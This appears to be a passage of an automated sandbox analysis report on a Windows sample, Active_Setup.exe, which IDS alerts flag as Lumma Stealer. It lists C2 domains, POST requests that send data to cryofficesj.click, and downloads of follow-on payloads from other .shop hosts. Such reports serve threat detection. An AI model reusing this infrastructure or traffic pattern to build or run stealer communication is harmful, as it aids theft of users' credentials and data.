              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h0_2_00958B87
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, eax0_2_00968BF0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp byte ptr [ecx+eax+01h], 00000000h0_2_00968D9A
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_0095CDF9
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0096AF76
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_009630B6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+12h]0_2_0096907D
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h0_2_009591D2
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, ebx0_2_009552DE
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov dword ptr [esp], edx0_2_009793D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h0_2_009793D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp word ptr [ebp+esi+02h], 0000h0_2_0096934F
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0096D4A0
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0096D4D4
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ah, dl0_2_0094F4C7
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 0827F28Dh0_2_00955509
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0096D44A
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, eax0_2_00967796
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-33h]0_2_009677B6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx edi, byte ptr [ebx]0_2_0096B7D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00955767
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00955767
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ebx, ecx0_2_0095F836
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]0_2_0095984E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_00963B1C
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0095DC88
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ebx, eax0_2_0094DC8B
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B1BF3DAh0_2_00979D5A
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, eax0_2_0095BEF6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ecx, eax0_2_00969E36
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h0_2_00979F46
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h0_2_00979F46
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then test eax, eax0_2_00979F46
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp edx, esi0_2_00979F46

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: cryofficesj.click
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.37.128:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UPKT1BAEQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18108Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7QUBYJNPHNLVMQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8759Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VRN1V18XB5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20388Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1TU6Q0GRHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5423Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9GG5ZRYHRIWU2KO84LRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1262Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XTI3RS82PTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568927Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: cryofficesj.click
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_00FB65A0 curl_easy_recv,GetProcAddress,VirtualAlloc,0_2_00FB65A0
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: cryofficesj.click
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
              Source: global trafficDNS traffic detected: DNS query: dfgh.online
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cryofficesj.click
              Source: Active_Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Active_Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: Active_Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: Active_Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Active_Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Active_Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: Active_Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: Active_Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Active_Setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Active_Setup.exeString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html
              Source: Active_Setup.exeString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html#
              Source: powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: Active_Setup.exeString found in binary or memory: http://ocsp.digicert.com0
              Source: Active_Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
              Source: Active_Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
              Source: Active_Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: Active_Setup.exeString found in binary or memory: http://www.digicert.com/CPS0
              Source: powershell.exe, 00000004.00000002.1944489969.000000000729F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: Active_Setup.exeString found in binary or memory: http://www.openssl.org/support/faq.html
              Source: Active_Setup.exeString found in binary or memory: http://www.openssl.org/support/faq.html....................
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Active_Setup.exe, 00000000.00000003.1812503861.0000000003ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Active_Setup.exe, 00000000.00000002.1934142517.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933387895.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: Active_Setup.exe, 00000000.00000002.1934142517.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933387895.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: Active_Setup.exe, 00000000.00000003.1888154365.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryofficesj.click/
              Source: Active_Setup.exe, 00000000.00000003.1860424960.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1812491535.0000000003A9F000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1836269859.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1887755366.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1812784287.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1877831557.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryofficesj.click/api
              Source: Active_Setup.exe, 00000000.00000003.1877831557.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryofficesj.click/api_
              Source: Active_Setup.exe, 00000000.00000003.1887755366.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1888154365.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryofficesj.click/apij
              Source: Active_Setup.exe, 00000000.00000003.1877780850.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1935389766.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860459644.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1908939711.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1888096331.0000000003A9C000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860424960.0000000003A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cryofficesj.click/apipXQ
              Source: Active_Setup.exe, 00000000.00000003.1877831557.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1881263103.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1860274897.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryofficesj.click/s
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
              Source: powershell.exe, 00000004.00000002.1940316473.0000000002CEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004F1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PCt
              Source: powershell.exe, 00000004.00000002.1944197772.0000000007101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1940996495.0000000004FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: Active_Setup.exe, 00000000.00000002.1934226305.0000000000BF5000.00000004.00000020.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933666444.0000000000BF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: Active_Setup.exe, 00000000.00000003.1928822586.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtG3
              Source: Active_Setup.exe, 00000000.00000002.1935352330.0000000003A93000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1933101445.0000000003A93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtn8J
              Source: powershell.exe, 00000004.00000002.1943309782.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: Active_Setup.exe, 00000000.00000003.1790589203.0000000003AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Active_Setup.exe, 00000000.00000003.1802226156.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790698899.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790589203.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1802125356.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Active_Setup.exe, 00000000.00000003.1790698899.0000000003AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Active_Setup.exe, 00000000.00000003.1802226156.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790698899.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790589203.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1802125356.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Active_Setup.exe, 00000000.00000003.1790698899.0000000003AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Active_Setup.exe, 00000000.00000003.1790143337.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, Active_Setup.exe, 00000000.00000003.1790243068.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Active_Setup.exe, 00000000.00000003.1816838527.0000000003BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
